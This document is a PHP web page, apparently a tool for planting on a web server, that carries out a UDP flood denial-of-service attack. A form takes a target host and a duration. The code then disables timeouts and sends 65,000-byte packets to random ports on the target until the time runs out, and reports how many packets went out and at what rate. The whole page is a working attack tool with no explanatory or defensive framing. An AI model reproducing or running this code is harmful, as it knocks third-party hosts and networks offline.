- <html>
- <body>
- <center>
- <font color="00FF00">
- <pre>
- ___________________________0_____________________________<br>
- ___________________________00____________________________<br>
- __________________________0000___________________________<br>
- _________________________000000__________________________<br>
- ______________00_________000000__________00______________<br>
- _______________0000______000000______00000_______________<br>
- _______________000000____0000000___0000000_______________<br>
- ________________000000___0000000_0000000_________________<br>
- _________________0000000_000000_0000000__________________<br>
- ___________________000000_00000_000000___________________<br>
- ___________0000_____000000_000_0000__000000000___________<br>
- ____________000000000__0000_0_000_000000000______________<br>
- _______________000000000__0_0_0_000000000________________<br>
- ___________________0000000000000000______________________<br>
- ________________________000_0_0000_______________________<br>
- ______________________00000_0__00000_____________________<br>
- _____________________00_____0______00____________________<br>
- </pre>
- <STYLE>
- input{
- background-color: #00FF00; font-size: 8pt; color: #000000; font-family: Tahoma; border: 1 solid #666666;
- }
- button{
- background-color: #00FF00; font-size: 8pt; color: #000000; font-family: Tahoma; border: 1 solid #666666;
- }
- body {
- background-color: #000000;
- }
- </style>
- <?php
- //UDP
- if(isset($_GET['host'])&&isset($_GET['time'])){
- $packets = 0;
- ignore_user_abort(TRUE);
- set_time_limit(0);
- $exec_time = $_GET['time'];
- $time = time();
- //print "Started: ".time('d-m-y h:i:s')."<br>";
- $max_time = $time+$exec_time;
- $host = $_GET['host'];
- for($i=0;$i<65000;$i++){
- $out .= 'X';
- }
- while(1){
- $packets++;
- if(time() > $max_time){
- break;
- }
- $rand = rand(1,65000);
- $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
- if($fp){
- fwrite($fp, $out);
- fclose($fp);
- }
- }
- echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
- echo '<br><br>
- <form action="'.$surl.'" method=GET>
- <input type="hidden" name="act" value="phptools">
- Host: <br><input type=text name=host><br>
- Length (seconds): <br><input type=text name=time><br>
- <input type=submit value=Go></form>';
- }else{ echo '<br><b>UDP Flood</b><br>
- <form action=? method=GET>
- <input type="hidden" name="act" value="phptools">
- Host: <br><input type=text name=host value=><br>
- Length (seconds): <br><input type=text name=time value=><br><br>
- <input type=submit value=Go></form>';
- }
- ?>
- _________________________________________________________<br>
- Simple shell script by Alex
- </center>
- </body>
- </html>
